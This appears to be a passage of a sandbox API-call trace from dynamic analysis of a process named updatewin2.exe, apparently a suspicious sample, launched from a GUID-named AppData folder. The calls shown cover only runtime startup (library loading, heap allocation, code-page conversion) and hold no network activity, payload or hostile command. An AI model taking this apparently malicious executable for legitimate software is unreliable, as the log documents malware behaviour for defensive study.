(param_1=0x5d63d8) returned 0 [0129.701] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5f4 | out: lpSystemTimeAsFileTime=0x18f5f4*(dwLowDateTime=0xc2e052d0, dwHighDateTime=0x1d62438)) [0129.701] GetCurrentThreadId () returned 0x35c [0129.701] GetCurrentProcessId () returned 0x91c [0129.701] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5ec | out: lpPerformanceCount=0x18f5ec*=25010613405) returned 1 [0129.720] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0129.722] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.722] GetLastError () returned 0x57 [0129.723] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.723] GetLastError () returned 0x57 [0129.723] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0129.723] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0129.723] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.723] GetLastError () returned 0x57 [0129.723] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0129.724] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0129.726] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.726] GetLastError () returned 0x57 [0129.726] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.726] GetLastError () returned 0x57 [0129.726] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0129.726] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0129.727] GetProcessHeap () returned 0x5c0000 [0129.727] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.727] GetLastError () returned 0x57 [0129.727] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0129.727] GetLastError () returned 0x57 [0129.727] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0129.727] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x364) returned 0x5ead00 [0129.729] SetLastError (dwErrCode=0x57) [0129.729] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xc00) returned 0x5eb070 [0129.730] GetStartupInfoW (in: lpStartupInfo=0x18f528 | out: lpStartupInfo=0x18f528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033e0, hStdOutput=0x11d07e3c, hStdError=0xfffffffe)) [0129.730] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0129.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0129.731] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.731] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe\" " [0129.731] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe\" " [0129.731] IsValidCodePage (CodePage=0x4e4) returned 1 [0129.731] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f548 | out: lpCPInfo=0x18f548) returned 1 [0129.731] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee10 | out: lpCPInfo=0x18ee10) returned 1 [0129.731] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.731] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0129.731] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18ee24 | out: lpCharType=0x18ee24) returned 1 [0129.732] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.732] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.732] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.732] GetLastError () returned 0x57 [0129.732] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0129.733] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0129.733] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0129.733] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f324, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿäÐ\x89\x11`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0129.733] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.733] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0129.733] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0129.733] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e968, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0129.733] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f224, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿäÐ\x89\x11`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0129.733] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x80) returned 0x5ea3e8 [0129.733] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x417ca8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe")) returned 0x5f [0129.761] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xc8) returned 0x5ec478 [0129.761] RtlInitializeSListHead (in: ListHead=0x417bc8 | out: ListHead=0x417bc8) [0129.761] GetLastError () returned 0x0 [0129.761] GetEnvironmentStringsW () returned 0x5ec548* [0129.761] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xaca) returned 0x5ed020 [0129.761] FreeEnvironmentStringsW (penv=0x5ec548) returned 1 [0129.761] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x98) returned 0x5ec548 [0129.761] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3e) returned 0x5edb10 [0129.761] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x6c) returned 0x5ec5e8 [0129.761] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x6e) returned 0x5ec660 [0129.761] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x78) returned 0x5d1180 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x62) returned 0x5ec6d8 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2e) returned 0x5d52d0 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x48) returned 0x5ec748 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x28) returned 0x5ea470 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1a) returned 0x5ec028 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4a) returned 0x5ec798 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x72) returned 0x5d1200 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x30) returned 0x5d5308 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2e) returned 0x5d5340 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1c) returned 0x5ec050 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xd2) returned 0x5ec7f0 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x7c) returned 0x5ec8d0 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x36) returned 0x5ec958 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3a) returned 0x5edb58 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x90) returned 0x5ec998 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x24) returned 0x5eca30 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x30) returned 0x5d5378 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x36) returned 0x5eca60 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x48) returned 0x5ecaa0 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x52) returned 0x5ecaf0 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3c) returned 0x5edba0 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x82) returned 0x5ecb50 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2e) returned 0x5d53b0 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1e) returned 0x5ec078 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2c) returned 0x5d53e8 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x54) returned 0x5ecbe0 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x52) returned 0x5ecc40 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2a) returned 0x5d5420 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3c) returned 0x5edbe8 [0129.762] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x54) returned 0x5ecca0 [0129.763] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x24) returned 0x5ecd00 [0129.763] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x30) returned 0x5d5458 [0129.763] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x8c) returned 0x5ecd30 [0129.763] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed020 | out: hHeap=0x5c0000) returned 1 [0129.763] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x800) returned 0x5ecdc8 [0129.764] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0129.764] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402b17) returned 0x404e49 [0129.775] GetStartupInfoW (in: lpStartupInfo=0x18f590 | out: lpStartupInfo=0x18f590*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.776] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x1423) returned 0x5eeaf8 [0129.776] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x1423) returned 0x5eff28 [0129.776] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec118 [0129.776] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x18) returned 0x5ed5d0 [0129.776] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec140 [0129.776] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x30) returned 0x5d5490 [0129.776] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed5d0 | out: hHeap=0x5c0000) returned 1 [0129.776] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec168 [0129.776] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x48) returned 0x5ed5d0 [0129.776] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5d5490 | out: hHeap=0x5c0000) returned 1 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec190 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x60) returned 0x5ed620 [0129.777] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed5d0 | out: hHeap=0x5c0000) returned 1 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x90) returned 0x5ed688 [0129.777] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed620 | out: hHeap=0x5c0000) returned 1 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec1b8 